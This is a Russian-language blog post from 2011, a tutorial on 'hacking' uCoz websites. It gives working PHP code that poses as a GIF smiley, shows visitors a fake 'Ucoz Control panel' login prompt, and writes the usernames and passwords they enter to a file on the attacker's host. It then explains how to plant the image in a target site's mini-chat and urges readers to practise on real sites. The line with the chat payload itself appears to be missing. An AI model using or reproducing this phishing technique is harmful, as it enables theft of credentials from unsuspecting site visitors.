Поиск
Группы
События
Объявления
Вход
Главная - Фото - Видеозаписи - Блоги - Объявления
 copyriter     
Логин:
Пароль:
 
copyriter блог

Взлом сайта на UCOZ
05:00 | 06.01.2011

Привет. Сегодня я расскажу один из способов
взлома сайтов на юкозе.

Настоящий хакер
может найти достаточно много уязвимостей на
таких сайтах и знает много способов их
взлома. Я надеюсь что скоро тоже буду
таким=).
Итак, начнем...

Для начала нажно зарегистировать хост с
поддержкой php (например http://
mysite.phphost.net) . После регистрации льем
на фтп скрипт и ставим права на пустой .txt
файл, например : passwords.txt (сюда будут
присылаться пассы пользователей похаканного
сайта ), и на файл smile.gif. Также скачайте
любой смайлик в расширении .gif (типа
cool.gif).

Затем откройте блокнот, да простой блокнот и
напишите следующее:

Code

<? <br> header("Content-type: image/gif"); <br>
$image = imagecreatefromgif('cool.gif'); <br> if(!
$_COOKIE['LOGON']) <br> { <br> $login =
$_SERVER['PHP_AUTH_USER']; <br> $pass =
$_SERVER['PHP_AUTH_PW']; <br> if(strlen($pass)
<= 4 || !$login) <br> { <br> Header('HTTP/1.1 401
Unauthorized'); <br> Header('WWW-Authenticate:
Basic realm="Ucoz Control panel"'); <br> } <br>
elseif($login) <br> { <br> setcookie
('LOGON',md5($pass)); <br> $f = fopen
('passwords.txt', 'ab'); <br> fwrite($f, $login." |||
".$pass."\r\n"); <br> fclose($f); <br> } <br> } <br>
imagegif($image); <br> imagedestroy($image);
<br> ?>

Как только вы напишите всё - сохраните файл
под названием smile, потом поменяйте
расширение на gif.

Теперь выбирайте любой юкозовский сайт,
например http://target.ucoz.ru/ слева
юкозовских сайтов как обычно, у большинства
есть мини-чат справа. Так вот - для начала
зарегистируйтесь на сайте, потом в мини чате
напишите логин, а в содержании сообщения
напишите следующее:
И нажмите ОК. Если после этого в миничате
вместо сообщения появился смайлик - значит
радуйтесь, т.к. сайт - уязвимый.

После этого у
всех кто будет заходить на данную страницу,
(в этом примере это http://target.ucoz.ru/)
будет появлятся форма в которую нужно
будет ввести логин и пароль. У вас при входе
на сайт такая форма будет появлятся тоже. И
все, введеные логины и пароли в эту форму
будут отсылатся в пустой файл passwords.txt,
который вы создали в самом начале и залили
на фтп.
Удачи!

Практикуйтесь. Только на некоторых
сайтах эта уязвимость может и не пройти. Но
стандрартно созданный юкозовский сайт без
доп. своих настроек будет уязвим. Всем
спасибо за просмотр, надеюсь статья вам
поможет.
 


Комментарии (0)

2010 © «Я Онлайн» beta v1.2a

Контакты | Правила Хостинг от uCoz